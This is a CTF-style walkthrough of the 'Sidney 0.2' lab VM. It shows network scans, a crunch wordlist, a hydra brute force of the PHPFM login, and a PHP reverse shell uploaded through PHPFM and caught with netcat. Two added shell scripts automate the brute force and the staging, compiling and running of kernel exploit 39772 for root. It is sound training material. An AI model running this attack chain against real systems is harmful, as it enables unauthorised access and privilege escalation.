Sidney: 0.2
Tools:
- netdiscover
- Nmap
- Wfuzz
- Nikto
- Burp Suite
- Hydra
Vulnerabilities:
- PHPFM Arbitrary File Upload
- Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ in bpf(BPF_PROG_LOAD) Local Root Exploit
Use netdiscover to find the target's IP address:
netdiscover -i eth0 -r 192.168.41.0/24
192.168.41.153 is the target.
Then run nmap to find the open ports and the services running on the target machine:
nmap -sV -v -O -A -T5 192.168.41.153 -p-
Only port 80 is open.
Use nikto to scan it:
nikto -h 192.168.41.153
Nothing useful comes out.
The result is still the same.
Browsing to http://192.168.41.153 shows only a picture.
Inspecting the picture's details reveals a path:
http://192.168.41.153/commodore64/
Now run nikto against that path:
nikto -h http://192.168.41.153/commodore64/
It finds an interesting file, index.php.
Opening it gives a login page, and the CMS appears to be PHPFM:
searchsploit PHPFM
This finds a PHPFM Arbitrary File Upload exploit. To use it I need a way to upload a shell, which first requires access to PHPFM.
At http://192.168.41.153/commodore64 I found this hint:
I will try robhubbard as the username. The password hint reads "a C64 sound chip lowercase 3letters4digits without spaces". After checking Wikipedia and other sites, MOS (MOS Technology, maker of the C64's sound chip) supplies the three letters, so the dictionary is mos followed by four digits, with minimum and maximum length 7:
crunch 7 7 -t mos%%%% > test.txt
Before running hydra against the login, I use Burp to capture the response to an incorrect login; hydra needs that failure string to tell a wrong password from the right one.
This yields the password mos6518.
Logging in gives this page:
After uploading a PHP reverse shell (reverse.php) through PHPFM, set up a netcat listener and browse to http://192.168.41.153/commodore64/reverse.php
and get a shell:
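The wordlist and hydra steps above, as an added example that is not the author's command listing: it generates the same mos + four-digit candidates that crunch produced and feeds them to hydra's http-post-form module. The form field names (username, password), the login path /commodore64/index.php and the failure marker "Login failed" are assumptions; take the real values from the Burp capture of a failed login.

```shell
#!/bin/sh
# Added example, not from the original write-up.
# Assumptions: the PHPFM login form posts "username" and "password" to
# /commodore64/index.php and answers a bad login with a page that contains
# "Login failed". Read the real field names and failure string from Burp.
set -e

TARGET=192.168.41.153
WORDLIST=test.txt

# Same candidate space as: crunch 7 7 -t mos%%%%  (mos0000 .. mos9999)
gen_wordlist() {
  i=0
  while [ "$i" -le 9999 ]; do
    printf 'mos%04d\n' "$i"
    i=$((i + 1))
  done
}

# Build hydra's http-post-form spec from what Burp showed.
# Args: path, user field name, password field name, failure marker.
# F= tells hydra which response text means "wrong password"; anything
# without that marker is reported as a hit.
post_form_spec() {
  printf '%s:%s=^USER^&%s=^PASS^:F=%s' "$1" "$2" "$3" "$4"
}

run_hydra() {
  gen_wordlist > "$WORDLIST"
  # -f stops after the first valid username/password pair
  hydra -f -l robhubbard -P "$WORDLIST" "$TARGET" \
    http-post-form "$(post_form_spec /commodore64/index.php username password 'Login failed')"
}

# Only attack when invoked as: sh bruteforce_phpfm.sh run
if [ "${1:-}" = "run" ]; then
  run_hydra
fi
```

If the failure marker is wrong, hydra reports every candidate as valid, so confirm the string against the Burp response before trusting a hit.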
The target's kernel is 4.4.0, so search for a matching exploit:
searchsploit 4.4 | grep linux
This finds Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit (Exploit-DB 39772).
In Kali:
On the target:
Upload 39772.zip via PHPFM, then in the shell run:
find / -name 39772.zip
which shows the file in /var/www/html/commodore64/.
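Staging the kernel exploit on the target, as an added example that is not the write-up's own command listing: the unpack and build sequence follows the 39772 package as published on Exploit-DB (an exploit.tar inside the zip that unpacks to ebpf_mapfd_doubleput_exploit/, whose compile.sh builds doubleput with gcc). It assumes gcc is present on the target and that the zip is in /var/www/html/commodore64/ as found above; the is_target_kernel gate and the /tmp working directory are my additions.

```shell
#!/bin/sh
# Added example, not from the original write-up.
# Assumptions: 39772.zip is in the PHPFM upload directory below, the target
# has gcc, and the zip has the layout published on Exploit-DB
# (exploit.tar -> ebpf_mapfd_doubleput_exploit/ with compile.sh).
set -e

UPLOAD_DIR=/var/www/html/commodore64
ZIP=39772.zip
WORK=/tmp/ebpf

# The exploit targets the 4.4.x kernels shipped with Ubuntu 16.04; refuse to
# run it against anything else. Argument is uname -r output (e.g. 4.4.0-21-generic).
is_target_kernel() {
  case "$1" in
    4.4.*) return 0 ;;
    *)     return 1 ;;
  esac
}

stage_and_run() {
  kernel=$(uname -r)
  if ! is_target_kernel "$kernel"; then
    echo "kernel $kernel is not 4.4.x; not running the exploit" >&2
    return 1
  fi
  mkdir -p "$WORK"
  cd "$WORK"
  cp "$UPLOAD_DIR/$ZIP" .
  unzip -o "$ZIP"
  # The zip may or may not add a top-level directory, so locate the tarball.
  tar xf "$(find . -name exploit.tar | head -n 1)"
  dir=$(find . -type d -name ebpf_mapfd_doubleput_exploit | head -n 1)
  if [ -z "$dir" ]; then
    echo "exploit directory not found after unpacking" >&2
    return 1
  fi
  cd "$dir"
  ./compile.sh      # gcc builds doubleput and its helper binaries
  ./doubleput       # on success it drops a root shell after a few seconds
}

# Only run when invoked as: sh stage_39772.sh run
if [ "${1:-}" = "run" ]; then
  stage_and_run
fi
```

Building in /tmp rather than the web root keeps the compiled binaries out of the document tree PHPFM serves.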
We get root: